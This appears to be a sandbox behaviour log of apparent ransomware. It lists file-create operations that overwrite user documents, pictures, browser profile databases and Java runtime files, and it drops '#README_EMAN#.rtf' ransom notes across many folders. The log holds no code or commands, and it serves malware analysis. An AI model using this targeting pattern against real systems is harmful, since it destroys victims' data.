| Create | C:\Users\CIiHmnxMn6Ps\Documents\IHepA6qmtTk6v8 rtu\wqHfuxshMYQlz.odt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\Database1.accdb | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\cookies.sqlite | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\cXulwEpXFuX3h8kmE.docx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\FiKLlYoo j5ePOAA.odt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Access\AccessCache.accdb | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\V_-s9qc7fmZDb\-omfRXhku4HtqHef7\k-jt3_fF8Y22f3ge\3PnXkAK4_WoRrsR.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\desktop.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\5UC29z.xlsx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\IHepA6qmtTk6v8 rtu\5QVKTwqSooul.docx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\IHepA6qmtTk6v8 rtu\54Z4PLTGEqndqiz3l.ods | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\B2HRjnj Cy6A-H dgdys.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\V_-s9qc7fmZDb\-omfRXhku4HtqHef7\k-jt3_fF8Y22f3ge\cDSWR2OIb8.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\jabswitch.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\formhistory.sqlite | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\kinto.sqlite | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\permissions.sqlite | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\places.sqlite | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\keytool.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\n94BTv1wcjugrAM5GRY9.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Installer\chrome.7z | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\secmod.db | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\64ViLky MJ-FbLZtty.xls | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\uTLPAIPSplyVaoV88\EM8H.doc | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\cert8.db | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\pA4DlvvotSqCLQb.xlsx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\qeYwSL.docx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\j1_seNfY9YsSPrO.xlsx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\L2 LL5CzSzHg0d.docx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\uTLPAIPSplyVaoV88\sQcpe7y_e37kKQ 1S.ods | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\uTLPAIPSplyVaoV88\4ueyApzjR.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\V_-s9qc7fmZDb\-omfRXhku4HtqHef7\k-jt3_fF8Y22f3ge\FkQKXs7m2F.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\java.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\IHepA6qmtTk6v8 rtu\xg45.xls | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\uTLPAIPSplyVaoV88\vi3pXsOlMjGV.doc | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\key3.db | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\FEPhIIgzp.xlsx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\kinit.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\0wJchQcNkFvmoOWLqz.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\cQep-2gcU8N-eLTI1k\WVY4HBl.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\ffjcext.zip | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\uTLPAIPSplyVaoV88\sZ-mvJRFLSQGLSr.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\V_-s9qc7fmZDb\-omfRXhku4HtqHef7\k-jt3_fF8Y22f3ge\FqTQKxshtz5\95MYVGF5_rM.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\javacpl.cpl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\cQep-2gcU8N-eLTI1k\FHEJii.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\V_-s9qc7fmZDb\zHUFhJqrOM5gMx575z_\t2vg0Qz0z6T.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\javaws.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\kAZBkdhribwEPz- GM.docx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\uTLPAIPSplyVaoV88\gzgG b o3c.ods | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\QiIJIhuAAuEZBbLqKHJ6.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\V_-s9qc7fmZDb\-omfRXhku4HtqHef7\k-jt3_fF8Y22f3ge\ctKhzFxQrBX.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\java-rmi.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\V_-s9qc7fmZDb\sUjiIGFw8gHqMQ5uJmO.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\javaw.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\server\Xusage.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\OfflineCache\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\classlist | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\policytool.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\servertool.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\klist.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\orbd.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\ktab.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\rmid.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\tnameserv.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\accessibility.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Access\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\cmm\LINEAR_RGB.pf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\storage\permanent\chrome\idb\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\content-types.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_ja.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\storage\permanent\moz-safe-about+home\idb\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\unpack200.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\amd64\jvm.cfg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\splash_11@2x-lic.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\cmm\CIEXYZ.pf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_sv.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\ext\sunec.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_fr.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\cmm\PYCC.pf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaBrightItalic.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_ko.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\ext\cldrdata.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\splash@2x.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\jjs.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_es.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\ssvagent.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\currency.data | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\splash.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\IHepA6qmtTk6v8 rtu\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\uTLPAIPSplyVaoV88\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\rmiregistry.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\cmm\GRAY.pf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\win32_CopyNoDrop32x32.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\ext\meta-index | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_zh_CN.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\V_-s9qc7fmZDb\-omfRXhku4HtqHef7\k-jt3_fF8Y22f3ge\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\ext\localedata.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaBrightDemiBold.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\ext\dnsns.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\calendars.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\ext\sunjce_provider.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_it.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\jfr.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\ext\sunpkcs11.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\splash_11-lic.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\ext\nashorn.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_zh_HK.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\ext\jaccess.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
